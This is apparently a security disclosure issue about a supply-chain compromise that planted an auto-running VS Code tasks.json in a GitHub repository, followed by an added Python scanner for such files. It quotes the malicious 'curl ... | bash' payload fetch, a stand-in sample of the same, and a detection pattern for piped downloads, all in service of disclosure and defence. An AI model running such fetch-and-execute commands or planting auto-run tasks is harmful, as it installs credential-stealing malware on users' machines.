Description
Security Disclosure: This repository has been compromised
The repository hackforla/knowledgebase-content was compromised on February 9, 2026 by the TasksJacker campaign — a DPRK-linked supply chain attack. A malicious .vscode/tasks.json file was injected that automatically executes malware when anyone opens this repository in VS Code.
This is not spam. This disclosure is from the OpenSourceMalware.com research team, which first identified and published research on this campaign.
Compromised file
.vscode/tasks.json — contains a task with "runOn": "folderOpen" trigger
What the malicious file does
The tasks.json silently executes curl https://260120.vercel.app/... | bash when the folder is opened in VS Code. The payload is a multi-stage infostealer and backdoor targeting:
- Browser credentials and cookies
- Cryptocurrency wallet data
- SSH keys and Git credentials
- AWS/cloud credentials and API tokens
Why this matters for hackforla
As a civic tech organization with community volunteers, any contributor who has cloned and opened this repo in VS Code may have been compromised. We recommend notifying your contributors.
Immediate remediation steps
- Delete .vscode/tasks.json from this repository
- Force-push to remove it from git history
- Rotate credentials: The GitHub account credentials used to push to this repo were compromised — rotate PATs, SSH keys, and passwords
- Enable 2FA on all accounts with push access
- Notify contributors who may have cloned this repo between Feb 9 and now
- Scan machines of anyone with push access:
```
ps aux | grep "\.vscode.*node"
ls -la ~/.vscode/node-v*-*/
```
More information
- Full technical analysis: https://opensourcemalware.com/blog/tasksjacker
- Campaign scope: 354+ repositories across 229+ accounts compromised
- Attribution: DPRK-affiliated threat actors (medium-high confidence)
Disclosed by the OpenSourceMalware.com research team.
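For contributors checking their own clones, the following added example (not part of the original disclosure and not OpenSourceMalware.com's tooling) finds every `.vscode/tasks.json` under a directory and reports tasks that run on folder open, noting whether the command pipes a download into a shell. The function names, the `example.invalid` URL and the sample file are constructed for illustration; the check also looks at the per-OS `windows`/`linux`/`osx` override blocks, which goes slightly beyond the single case described above.

```python
import json
import re
from pathlib import Path

_STR = r'"(?:\\.|[^"\\])*"'
_COMMENT = re.compile(_STR + r'|//[^\n]*|/\*.*?\*/', re.S)
_TRAILING_COMMA = re.compile(_STR + r'|,(?=\s*[}\]])')
# A download piped straight into a shell, e.g. "curl ... | bash".
_PIPE_TO_SHELL = re.compile(r'\b(?:curl|wget)\b[^|]*\|\s*(?:ba|z|da)?sh\b')

def load_jsonc(text):
    """Parse tasks.json, which may contain comments and trailing commas (JSONC)."""
    keep_strings = lambda m: m.group(0) if m.group(0)[0] == '"' else ''
    text = _COMMENT.sub(keep_strings, text)
    return json.loads(_TRAILING_COMMA.sub(keep_strings, text))

def autorun_tasks(text):
    """Return (label, command line, pipes_to_shell) for every folderOpen task."""
    hits = []
    for task in load_jsonc(text).get("tasks", []):
        if task.get("runOptions", {}).get("runOn") != "folderOpen":
            continue
        # The command may sit at task level or in a per-OS override block.
        variants = [task, *(task.get(k) for k in ("windows", "linux", "osx"))]
        cmds = [" ".join(str(p) for p in [v["command"], *v.get("args", [])])
                for v in variants if isinstance(v, dict) and "command" in v] or [""]
        hits += [(task.get("label", "?"), c, bool(_PIPE_TO_SHELL.search(c))) for c in cmds]
    return hits

def scan(root):
    """Map each .vscode/tasks.json below root to the auto-run tasks it defines."""
    found = {}
    for path in Path(root).rglob("tasks.json"):
        if path.parent.name != ".vscode":
            continue
        try:
            hits = autorun_tasks(path.read_text(encoding="utf-8", errors="replace"))
        except (ValueError, AttributeError, TypeError):
            hits = [("<unparseable>", "review by hand", False)]
        if hits:
            found[str(path)] = hits
    return found

# Constructed sample, not the file from the compromised repository.
SAMPLE = '''{ "version": "2.0.0", // comments and trailing commas are allowed
  "tasks": [
    {"label": "build", "type": "shell", "command": "npm run build"},
    {"label": "env", "type": "shell", "runOptions": {"runOn": "folderOpen"},
     "command": "curl -s https://example.invalid/stage1 | bash",},
  ]}'''
```

Call `scan()` on the directory that holds your clones and read the file without opening the folder in VS Code; any `folderOpen` task you did not add yourself deserves review even when the shell-pipe flag is `False`.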